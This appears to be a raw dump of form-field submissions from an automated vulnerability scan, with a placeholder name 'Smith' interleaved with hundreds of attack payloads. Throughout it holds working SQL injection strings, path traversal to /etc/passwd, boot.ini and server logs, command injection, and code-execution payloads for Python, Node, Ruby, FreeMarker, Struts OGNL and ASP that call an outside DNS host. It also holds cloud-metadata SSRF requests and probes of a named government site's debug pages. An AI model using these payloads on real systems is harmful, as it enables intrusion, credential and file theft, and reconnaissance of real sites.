6588 Smith __import__('os').popen(__import__('base64').urlsafe_b64decode('bnNsb29rdXAgdGJpcXZlZHNxNm9ma3Bua3ZlbGw0Z2hmLWR2Z3kycnpybnZlZnNuZ2doay5yODcubWU=')).read()
6589
6590 |ping -n 25 127.0.0.1
6591 %2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
6592 require('dns').lookup('tbiqvedsq6c6vor7uid7krfsn33v-tzjhuh30j-n'.concat('ub4.r87.me'),_=>_)
6593 <%= "#{(require'base64';%x(#{Base64.urlsafe_decode64('bnNsb29rdXAgdGJpcXZlZHNxNmRsbmF0YjF4eWMyNG1nZH
6594 <%= "#{(require'base64';%x(#{Base64.urlsafe_decode64('bnNsb29rdXAgdGJpcXZlZHNxNmRrcmd3ZzJrMzJ5dDh0Y3
6595 |ping -n 25 127.0.0.1
6596 __import__('os').popen(('SET /A 268409241 - {0}').format('51806')).read()
6597
6598 |ping -n 1 127.0.0.1
6599 Smith
6600 |ping -n 1 127.0.0.1
6601 |ping -n 30 127.0.0.1
6602 |ping -n 30 127.0.0.1
6603 cast((SELECT dblink_connect('host=tbiqvedsq661q08qwtryllmms2t0isbskfedwmxw'||'a1w.r87.me user=a pass
6604
6605 Smith
6606 Smith require('dns').lookup('tbiqvedsq6njie1tj2od6hwjdhjohnzgyvptkqzr'.concat('fze.r87.me'),_=>_)
6607
6608 Smith
6609 Smith
6610 Smith
6611 ;netsparker(0x052F7B)//\
6612
6613 https://propertytax.jk.gov.in/elmah.axd
6614
6615 |ping -n 25 127.0.0.1
6616 |ping -n 25 127.0.0.1
6617
6618 [php]print(int)0xFFF9999-43886;[/php]
6619 Smith
6620 Smith [php]print(int)0xFFF9999-75611;[/php]
6621 Smith
6622 ${script:javascript:java.lang.Runtime.getRuntime().exec('nslookup tbiqvedsq6fg4_an7gfhrv8h5t6m9qft2lnerjcq'+'uos.r87.me')}
6623 cast((SELECT dblink_connect(chr(104)||chr(111)||chr(115)||chr(116)||chr(61)||chr(116)||chr(98)||chr(
6624 |sleep 25
6625 Smith 'AND 1=cast(0x5f21403264696c656d6d61 as varchar(8000)) or '1'='
6626 Smith %2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
6627 |sleep 25
6628 data:;base64,TlM3NzU0NTYxNDQ2NTc1
6629 |sleep 1
6630 |sleep 1
6631 |sleep 30
6632 |sleep 30
6633 propertytax.jk.gov.in/elmah.axd
6634 Smith
6635
6636
6637 <#assign ex="freemarker.template.utility.Execute"?new()>${ ex("cmd.exe /c nslookup tbiqvedsq67hbaoub
6638 cast((SELECT dblink_connect(chr(104)||chr(111)||chr(115)||chr(116)||chr(61)||chr(116)||chr(98)||chr(
6639 |sleep 25
6640 Smith
6641
6642
6643
6644 Smith
6645
6646 Smith
6647 %{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='26511').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?
6648 <#assign ex="freemarker.template.utility.Execute"?new()>${ ex("cmd.exe /c nslookup tbiqvedsq6j-fpkht
6649 Smith
6650 |sleep 25
6651 |sleep 1
6652 |sleep 1
6653 Smith ${script:javascript:java.lang.Runtime.getRuntime().exec('nslookup tbiqvedsq6tq6wafrgnri-tzefwcbu7kmpfubhnv'+'0sq.r87.me')}
6654 Smith
6655 Smith data:;base64,TlM3NzU0NTYxNDQ2NTc1
6656 -1 or 1=1 and (SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)
6657 propertytax.jk.gov.in/elmah.axd
6658
6659 Smith
6660 require 'resolv';Resolv.getaddress ("tbiqvedsq631nrqmtjf2g79fu07mxbs0b9ooc751".concat "nco.r87.me")
6661 Smith
6662 Smith %{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='10607').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?
6663
6664
6665
6666
6667 Smith
6668
6669 Smith
6670 Smith
6671 __import__('os').popen(__import__('base64').urlsafe_b64decode('bnNsb29rdXAgdGJpcXZlZHNxNmRwZWRqZWhsd
6672 Smith
6673 Smith
6674 Smith
6675 Smith
6676 Smith
6677 '+convert(int, cast(0x5f21403264696c656d6d61 as varchar(8000)))+'
6678 1 ns=netsparker(0x053BE9)
6679
6680 Smith
6681 ping -w 25 127.0.0.1
6682 Smith
6683
6684
6685
6686
6687 http://169.254.169.254/latest/meta-data/public-hostname
6688 Smith
6689 Smith
6690 http://169.254.169.254/latest/meta-data/public-hostname
6691 Smith
6692 http://127.0.0.1:22
6693 Smith ping -w 25 127.0.0.1
6694 Smith
6695
6696
6697
6698 Smith
6699
6700
6701
6702
6703
6704
6705
6706 Smith '+convert(int, cast(0x5f21403264696c656d6d61 as varchar(8000)))+'
6707 Smith 1 ns=netsparker(0x053BEA)
6708 Smith
6709
6710 Smith
6711
6712 Smith
6713 Smith
6714 Smith
6715 Smith
6716
6717 Smith
6718 |ping -n 25 127.0.0.1
6719 Smith
6720 |ping -n 1 127.0.0.1
6721 |ping -n 1 127.0.0.1
6722 |ping -n 30 127.0.0.1
6723 |ping -n 30 127.0.0.1
6724 Smith
6725 Smith
6726
6727
6728 Smith
6729
6730 Smith
6731
6732 http://:3306
6733
6734 Smith
6735 WEB-INF/web.xml
6736 n3tsp4rke2
6737 nxtspxrkex
6738
6739 N3TSP4RKE2
6740 /../../../../../../../../../../WEB-INF/web.xml
6741 Smith
6742 Smith |ping -n 25 127.0.0.1
6743 Smith
6744
6745
6746 Smith
6747 Smith
6748
6749 Smith
6750 Smith
6751 -1%27+and+6%3d3+or+1%3d1%2b(SELECT+1+and+ROW(1%2c1)%3e(SELECT+COUNT(*)%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.COLLATIONS+GROUP+BY+x)a)%2b%27
6752 Smith -1%27+and+6%3d3+or+1%3d1%2b(SELECT+1+and+ROW(1%2c1)%3e(SELECT+COUNT(*)%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.COLLATIONS+GROUP+BY+x)a)%2b%27
6753 Smith
6754 Smith
6755 Smith
6756 Smith
6757 Smith
6758 Smith
6759 http://[::1]:3306
6760
6761 Smith
6762
6763 Smith
6764 %27%22--%3E%3C%2Fstyle%3E%3C%2FscRipt%3E%3CscRipt%3Enetsparker%280x053D54%29%3C%2FscRipt%3E
6765
6766 Smith
6767
6768
6769 -1\'+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand(0)*2))x from INFORMATION_SCHEMA.COLLATIONS group by x limit 1))-- 1
6770 Smith
6771
6772
6773
6774
6775
6776 Smith
6777 Smith /../../../../../../../../../../WEB-INF/web.xml
6778 /../../../../../../../../../../var/log/apache2/access.log
6779
6780 Smith
6781 Smith
6782 Smith %27%22--%3E%3C%2Fstyle%3E%3C%2FscRipt%3E%3CscRipt%3Enetsparker%280x053D55%29%3C%2FscRipt%3E
6783 Smith -1\'+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand(0)*2))x from INFORMATION_SCHEMA.COLLATIONS group by x limit 1))-- 1
6784 |sleep 25
6785 ' UNION ALL SELECT CHAR(95)||CHAR(33)||CHAR(64)||CHAR(54)||CHAR(100)||CHAR(105)||CHAR(108)||CHAR(101)||CHAR(109)||CHAR(109)||CHAR(97) FROM INFORMATION_SCHEMA.SYSTEM_USERS-- zDyA
6786
6787
6788 Smith
6789 javascript:netsparker(0x053D94)
6790 Smith
6791 http://[::1]:3306
6792 Smith |sleep 25
6793 Smith
6794 Smith
6795 Smith
6796 Smith /../../../../../../../../../../var/log/apache2/access.log
6797
6798 Smith
6799
6800 Smith
6801 response.write(268409241-58518)'
6802
6803 Smith
6804 Smith ' UNION ALL SELECT CHAR(95)||CHAR(33)||CHAR(64)||CHAR(54)||CHAR(100)||CHAR(105)||CHAR(108)||CHAR(101)||CHAR(109)||CHAR(109)||CHAR(97) FROM INFORMATION_SCHEMA.SYSTEM_USERS-- zDyA
6805 Smith
6806
6807 Smith
6808
6809 Smith
6810 Smith
6811
6812 Smith javascript:netsparker(0x053D95)
6813
6814 Smith
6815 Smith
6816
6817 data:;base64,JyI+PHNjcmlwdD5uZXRzcGFya2VyKDB4MDUzREFBKTwvc2NyaXB0Pg==
6818
6819
6820 /../../../../../../../../../../etc/httpd/logs/access.log
6821
6822 Smith response.write(268409241-37398)'
6823 Smith
6824
6825
6826 Smith
6827 Smith
6828
6829 Smith
6830 Smith
6831 Smith
6832 Smith
6833 Smith
6834
6835 Smith
6836
6837 https://propertytax.jk.gov.in/server-status
6838 Smith
6839
6840
6841 +response.write(268409241-4105)'
6842 Smith
6843
6844
6845
6846 Smith
6847 Smith
6848 Smith
6849 Smith
6850 Smith
6851 Smith
6852 Smith
6853 Smith
6854 Smith +response.write(268409241-76734)'
6855 */netsparker(0x053DED);/*
6856 Smith
6857 Smith /../../../../../../../../../../etc/httpd/logs/access.log
6858
6859 Smith
6860 Smith
6861 Smith
6862
6863 Smith
6864 https://propertytax.jk.gov.in/server-status
6865
6866
6867 "& ping -n 25 127.0.0.1 &
6868 Smith data:;base64,JyI+PHNjcmlwdD5uZXRzcGFya2VyKDB4MDUzREFCKTwvc2NyaXB0Pg==
6869 Smith
6870
6871
6872
6873 gethostbyname(trim('tbiqvedsq6leodsqh36c7hnxk8n2ktazctwpbzkp'.'ini.r87.me'))
6874 Smith */netsparker(0x053DEE);/*
6875 "+response.write(268409241-60860)+"
6876
6877 gethostbyname(trim('tbiqvedsq6qskvt6laigd0eynq-zyaetoa03zyop'.'ayq.r87.me'));
6878 gethostbyname(trim('tbiqvedsq6im2vzpyj-xk1jstumptxo4w9ytiajh'.'7p4.r87.me'));
6879 http://169.254.169.254/opc/v1/instance
6880 Smith
6881 http://169.254.169.254/opc/v1/instance
6882 Smith
6883 Smith
6884 Smith
6885 Smith
6886 /../../../../../../../../../../var/log/nginx/access.log
6887
6888 Smith
6889 Smith "& ping -n 25 127.0.0.1 &
6890 Smith
6891
6892 Smith
6893 Smith
6894 Smith
6895 +gethostbyname(trim('tbiqvedsq6sz_wckbn9r6akpbkxn22-a-6ss4tkd'.'8pm.r87.me'));//
6896
6897
6898 '" ns=netsparker(0x053E4F)
6899 Smith
6900
6901 '+netsparker(0x053E51)+'
6902 Smith "+response.write(268409241-79932)+"
6903
6904 +gethostbyname(trim('tbiqvedsq6g7sq3nk4r_xobt7eq9qgnmlfy-skr1'.'gya.r87.me'));//
6905 https://metadata.packet.net/metadata
6906 Smith
6907
6908 Smith
6909 Smith
6910
6911 Smith
6912 '& ping -n 25 127.0.0.1 &
6913 Smith /../../../../../../../../../../var/log/nginx/access.log
6914 Smith '+netsparker(0x053E52)+'
6915
6916 Smith
6917
6918
6919 Smith
6920 '+gethostbyname(trim('tbiqvedsq69fbiv1mx6xz4adsvjzjdhjlopyfox8'.'r-0.r87.me'))+'
6921
6922 Smith
6923 Smith '& ping -n 25 127.0.0.1 &
6924 Smith
6925 Smith '& ping -n 1 127.0.0.1 &
6926 Smith '& ping -n 1 127.0.0.1 &
6927
6928 Smith '" ns=netsparker(0x053E50)
6929 https://metadata.packet.net/metadata
6930 Smith
6931 Smith
6932 '+gethostbyname(trim('tbiqvedsq6sbbrffnlgwkiloubye3un_3jzwtlar'.'xzu.r87.me'))+'
6933 Smith
6934
6935 Smith
6936 Smith
6937 /../../../../../../../../../../opt/lampp/logs/access_log
6938 "+netsparker(0x053FA3)+"
6939 1 ns=netsparker(0x053FA5)
6940
6941
6942
6943
6944
6945 & ping -n 25 127.0.0.1 &
6946
6947
6948
6949 "+gethostbyname(trim('tbiqvedsq6bxk-lng20yzbeyeccpux7izwamafbh'.'u-w.r87.me'))+"
6950 <% response.write(268409241-38117) %>
6951
6952 https://metadata.platformequinix.com/metadata
6953
6954 Smith
6955
6956 Smith <% response.write(268409241-60229) %>
6957 Smith & ping -n 25 127.0.0.1 &
6958 Smith
6959 \';netsparker(0x053FCD);///
6960 Smith
6961 Smith \';netsparker(0x053FCE);///
6962 Smith
6963 Smith 1 ns=netsparker(0x053FA6)
6964 %27
6965
6966 Smith
6967 "+gethostbyname(trim('tbiqvedsq6s73zcs3wsai5mcnbosln-nrf78tuh_'.'tqi.r87.me'))+"
6968 Smith
6969
6970 Smith
6971 Smith
6972 ping -n 25 127.0.0.1 &
6973 Smith
6974 https://metadata.platformequinix.com/metadata
6975 Smith
6976 Smith netsparker(0x053FEE)
6977 netsparker(0x053FEF);
6978
6979 Smith /../../../../../../../../../../opt/lampp/logs/access_log
6980
6981
6982
6983 Smith %27
6984 '{${gethostbyname(trim('tbiqvedsq6t6w6kkx_ebcgxcgq-jdymcoqxthrab'.'7ee.r87.me'))}}'
6985 /../../../../../../../../../../boot.ini
6986 Smith
6987 print(int)0xFFF9999-36170
6988 Smith ping -n 25 127.0.0.1 &
6989 Smith
6990 Smith
6991 Smith
6992 Smith
6993 /../../../../../../../../../../var/log/lighttpd/access.log
6994 Smith /../../../../../../../../../../var/log/lighttpd/access.log
6995 Smith
6996
6997 (select convert(int,cast(0x5f21403264696c656d6d61 as varchar(8000))) from syscolumns)
6998 '{${gethostbyname(trim('tbiqvedsq65xzyauqfusnotvpch3mmpjyp-6g4iq'.'37q.r87.me'))}}'
6999
7000 /../../../../../../../../../../boot.ini
7001 Smith print(int)0xFFF9999-54216
7002
7003 Smith 'AND 1=cast(0x5f21403264696c656d6d61 as varchar(8000)) or '1'='
7004 'AND 1=cast(0x5f21403264696c656d6d61 as varchar(8000)) or '1'='
7005
7006 file:///boot.ini
7007 file:///boot.ini
7008
7009 Smith javascript:netsparker(0x054258)
7010 Smith
7011 Smith
7012
7013 Smith &ping -w 25 127.0.0.1 &
7014 1/../../../../../../../../../../boot.ini
7015 createobject("WScript.Shell").exec("nslookup tbiqvedsq6qi0i9xpki-sdss5r-xjb4iakyezvy1" & "fhy.r87.me
7016 Smith
7017 javascript:netsparker(0x054257)
7018 Smith
7019 Smith -1 or 1=1 and (SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)
7020
7021 /../../../../../../../../../../AppServ/Apache24/logs/access.log
7022
7023 Smith
7024 ping -w 25 127.0.0.1 &
7025 createobject("WScript.Shell").exec("nslookup tbiqvedsq6r8h-tbglhvbrmzxbilwbzt3twruwsa" & "p90.r87.me
7026
7027 ns../../../../../../../../../../../boot.ini.........................................................
7028 +createobject("WScript.Shell").exec("nslookup tbiqvedsq6lngbdycqxzngva2vhmljtukdkrd8no" & "518.r87.m
7029 c:\boot.ini
7030 +createobject("WScript.Shell").exec("nslookup tbiqvedsq6rif4lar7uscccvumd5d38_bf731eld" & "wlc.r87.m
7031 ping -w 1 127.0.0.1 &
7032
7033
7034 ping -w 1 127.0.0.1 &
7035 Smith
7036 ping -w 30 127.0.0.1 &
7037 ping -w 30 127.0.0.1 &
7038 */netsparker(0x054265);/*
7039 print(int)0xFFF9999-80361;
7040 Smith netsparker(0x053FF0);
7041
7042
7043 Smith
7044 Smith
7045 Smith
7046 Smith
7047 Smith
7048
7049
7050 Smith print(int)0xFFF9999-83719;
7051
7052 Smith
7053 -1' and 6=3 or 1=1+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+'
7054 ns../../../../../../../../../../../boot.ini.........................................................
7055 Smith /../../../../../../../../../../AppServ/Apache24/logs/access.log
7056 Smith
7057 +createobject("WScript.Shell").exec("nslookup tbiqvedsq61ja7ous3s9_nhps_fw69k400ie1ekt" & "2jo.r87.m
7058
7059 +print(int)0xFFF9999-59814;//
7060 Smith +print(int)0xFFF9999-81801;//
7061 Smith
7062 '+print(int)0xFFF9999-45947+'
7063
7064
7065 Smith
7066 +createobject("WScript.Shell").exec("nslookup tbiqvedsq608gi7b6fse55rzd_lwirhb2dhegpmm" & "2ta.r87.m
7067 Smith ping -w 25 127.0.0.1 &
7068 ../../../../../../../../../../xampp/apache/logs/access.log
7069
7070
7071 Smith */netsparker(0x054266);/*
7072 Smith '+print(int)0xFFF9999-99507+'
7073 Smith -1' and 6=3 or 1=1+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+'
7074 Smith
7075
7076 %2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini
7077 Smith
7078 Smith
7079 Smith
7080 Smith
7081 Smith
7082 Smith
7083 ping -n 25 127.0.0.1
7084 Smith
7085
7086 Smith
7087
7088 %2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini
7089
7090 Smith
7091 Smith
7092 Smith
7093 Smith
7094 Smith
7095 <%createobject("WScript.Shell").exec("nslookup tbiqvedsq6p5svokfi_diyphryqskmyuptk2gcx5" & "p4q.r87.
7096 Smith ../../../../../../../../../../xampp/apache/logs/access.log
7097 Smith
7098 Smith
7099 Smith
7100 Smith
7101
7102 Smith
7103 Smith
7104
7105
7106 Smith %22%2bnetsparker(0x054299)%2b%22
7107
7108 Smith
7109 Smith
7110 Smith
7111
7112 Smith
7113
7114
7115 '+netsparker(0x05429A)+'
7116 Smith "+print(int)0xFFF9999-3134+"
7117 Smith
7118 -1" and 6=3 or 1=1+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+"
7119 Smith
7120
7121
7122 <%createobject("WScript.Shell").exec("nslookup tbiqvedsq6jfl4fcubk9ocvm2nessic0m0nruzst" & "mpw.r87.
7123 Smith
7124 Smith
7125
7126 Smith
7127 Smith
7128 Smith
7129 Smith
7130 Smith
7131 Smith
7132 Smith
7133
7134 Smith
7135 Smith
7136 Smith -1" and 6=3 or 1=1+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+"
7137
7138 Smith
7139 Smith
7140
7141 /../../../../../../../../../../var/log/apache/access.log
7142
7143 Smith
7144 gethostbyname(lc 'tbiqvedsq6w_yyc3a8qm1bj1gkyewzdrylh_ejad'.'6ie.r87.me')
7145 Smith
7146
7147 Smith
7148 Smith
7149 Smith
7150 {php}print(int)0xFFF9999-63879;{/php}
7151 "+createobject("WScript.Shell").exec("nslookup tbiqvedsq6o7cw33kxjavlpjvmfkbob-wqaduohl" & "mfw.r87.
7152 Smith ping -n 25 127.0.0.1
7153
7154 Smith
7155 ping -w 25 127.0.0.1
7156 ping -w 1 127.0.0.1
7157 Smith
7158 ping -w 1 127.0.0.1
7159 Smith
7160 ping -w 30 127.0.0.1
7161 file%3a%2f%2f%2fboot.ini
7162 Smith
7163 ping -w 30 127.0.0.1
7164 Smith
7165 Smith '+netsparker(0x05429B)+'
7166
7167 Smith
7168 Smith
7169
7170 Smith
7171 Smith
7172 Smith {php}print(int)0xFFF9999-8642;{/php}
7173 Smith
7174 Smith
7175 (SELECT CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)))
7176 Smith
7177 gethostbyname(lc 'tbiqvedsq6iubhiuujgmuudnerdriazthbhyp2ge'.'q-0.r87.me')
7178 Smith
7179 Smith
7180 Smith
7181 Smith
7182 Smith
7183
7184 Smith
7185
7186 Smith
7187 '{${print(int)0xFFF9999-73218}}'
7188 Smith
7189
7190 Smith
7191 Smith
7192 Smith
7193
7194
7195
7196
7197 eval('gethostbyname(lc 'tbiqvedsq6sn_ewj9rls2lecb8crb_bckawyx6om'.'zzk.r87.me')')
7198 '+gethostbyname(lc 'tbiqvedsq6g9rztdptjyjc_x8rn80vbi9gyme714'.'xu4.r87.me')+'
7199 eval('gethostbyname(lc 'tbiqvedsq6nswuaptpybue6xszcyhcyatvmhzsk_'.'gsw.r87.me')')
7200 '+gethostbyname(lc 'tbiqvedsq6bhgy6m2mc3nnroxcvder2obamvtcf3'.'1sk.r87.me')+'
7201 Smith
7202 Smith
7203 Smith
7204 Smith
7205 Smith
7206 //r87.com/?0x0542D5
7207 Smith //r87.com/?0x0542D6
7208
7209 Smith
7210 Smith
7211 Smith
7212 Smith
7213 Smith ping -w 25 127.0.0.1
7214 Smith
7215 Smith
7216
7217 Smith
7218 Smith
7219 Smith
7220 Smith
7221 Smith
7222 Smith '{${print(int)0xFFF9999-66703}}'
7223 Smith
7224 Smith
7225 Smith
7226 [php]print(int)0xFFF9999-97727;[/php]
7227 Smith
7228 file%3a%2f%2f%2fboot.ini
7229 Smith
7230 Smith
7231 Smith
7232 Smith
7233
7234 Smith
7235 Smith
7236 Smith (SELECT CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)))
7237 Smith
7238 Smith
7239 Smith
7240 Smith
7241 Smith
7242 |ping -n 25 127.0.0.1
7243 Smith
7244 Smith
7245
7246 Smith
7247 Smith
7248 "+netsparker(0x0542DE)+"
7249 Smith
7250 Smith
7251 c%3a%5cboot.ini
7252 Smith
7253
7254 Smith
7255 "+gethostbyname(lc 'tbiqvedsq69yuvjtoumizm8oqkqiqjktoypqbxol'.'ghy.r87.me')+"
7256 "+gethostbyname(lc 'tbiqvedsq6tdvphb452asetxbhlyl1ky35j392yx'.'ukw.r87.me')+"
7257 Smith
7258 Smith
7259 Smith
7260
7261 Smith
7262 Smith
7263 Smith
7264 Smith
7265 Smith
7266 Smith
7267 Smith
7268 Smith
7269 Smith
7270 Smith |ping -n 25 127.0.0.1
7271 Smith
7272
7273 Smith
7274 cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric)
7275 Smith
7276 Smith
7277
7278 Smith
7279
7280 nslookup tbiqvedsq6kwefbclemnoxriclqafqxfqqt57ijo^bg8.r87.me&'\"`0&nslookup tbiqvedsq6kwefbclemnoxri
7281
7282 Smith
7283 Smith
7284
7285
7286 Smith
7287 Smith
7288 Smith
7289 Smith
7290 Smith
7291 Smith
7292 Smith
7293 Smith
7294 Smith [php]print(int)0xFFF9999-65101;[/php]
7295 Smith
7296
7297 Smith
7298 Smith
7299 Smith
7300 nslookup tbiqvedsq6yhpnlm98ec1zcvgk3_h3hlexaznckx^liq.r87.me&'\"`0&nslookup tbiqvedsq6yhpnlm98ec1zcv
7301 Smith
7302 Smith
7303 Smith
7304 Smith
7305 Smith
7306 Smith
7307 Smith
7308 |sleep 25
7309 %{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='23062').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?
7310 c%3a%5cboot.ini
7311 Smith
7312
7313 Smith cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric)
7314 Smith
7315 Smith
7316 Smith
7317 Smith
7318 Smith
7319
7320 Smith
7321 Smith
7322 Smith
7323 Smith
7324 Smith
7325 Smith
7326
7327 Smith
7328
7329
7330 Smith
7331 Smith
7332 Smith
7333
7334 Smith
7335 Smith
7336 Smith
7337 Smith
7338 Smith
7339 Smith "+netsparker(0x0542DF)+"
7340 Smith
7341 Smith
7342 Smith
7343 Smith %{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='82024').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?
7344 Smith
7345 Smith
7346 & nslookup tbiqvedsq6jfjitachz4_ezb-qz8wsmls_mn3wqt^1li.r87.me&'\"`0&nslookup tbiqvedsq6jfjitachz4_e
7347
7348
7349 /../../../../../../../../../../web.config
7350 Smith
7351
7352
7353 Smith
7354 Smith
7355
7356 Smith
7357 Smith
7358 Smith
7359
7360 Smith
7361 Smith
7362 Smith
7363
7364 Smith
7365 Smith
7366 Smith |sleep 25
7367 Smith
7368 Smith
7369 /../../../../../../../../../../boot.ini
7370 Smith
7371 print localtime()*0+0xFFF9999-74669
7372
7373 Smith
7374
7375 Smith
7376 Smith
7377
7378 Smith
7379 Smith
7380 Smith
7381
7382
7383 Smith
7384
7385
7386 Smith
7387 (select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL)
7388 Smith
7389
7390
7391
7392 '& nslookup tbiqvedsq6gruboarhzf4ijcgxzetyftxvenfc2f^vyy.r87.me&'\"`0&nslookup tbiqvedsq6gruboarhzf4
7393
7394
7395 Smith
7396 /../../../../../../../../../../windows/win.ini
7397 Smith
7398 Smith (select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL)
7399
7400
7401
7402 Smith
7403 Smith '||cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric)||'
7404 Smith
7405
7406 Smith
7407 Smith
7408 NSFTW
7409
7410 Smith
7411 Smith
7412
7413 Smith print localtime()*0+0xFFF9999-27083
7414 Smith
7415 Smith
7416
7417 nslookup "tbiqvedsq67if72dotanhdqf26ww7kkxu1kaklpc""spk.r87.me"
7418
7419 Smith
7420
7421 Smith
7422
7423 Smith
7424 Smith
7425 Smith
7426 Smith
7427 Smith
7428 Smith
7429 Smith
7430 Smith
7431 Smith
7432 \';netsparker(0x054437);///
7433 Smith
7434 Smith
7435 Smith
7436 Smith
7437 Smith
7438 Smith
7439 /../../../../../../../../../../boot.ini
7440 Smith
7441 Smith
7442 Smith
7443 Smith
7444 Smith
7445 Smith
7446 Smith
7447 Smith
7448
7449 Smith
7450 Smith
7451 eval('print localtime()*0+0xFFF9999-48609')
7452 Smith
7453 Smith
7454 //r87.com/n/j/?0x054439
7455 Smith
7456 Smith
7457 Smith
7458
7459 Smith
7460 Smith
7461 Smith
7462 Smith
7463 Smith
7464
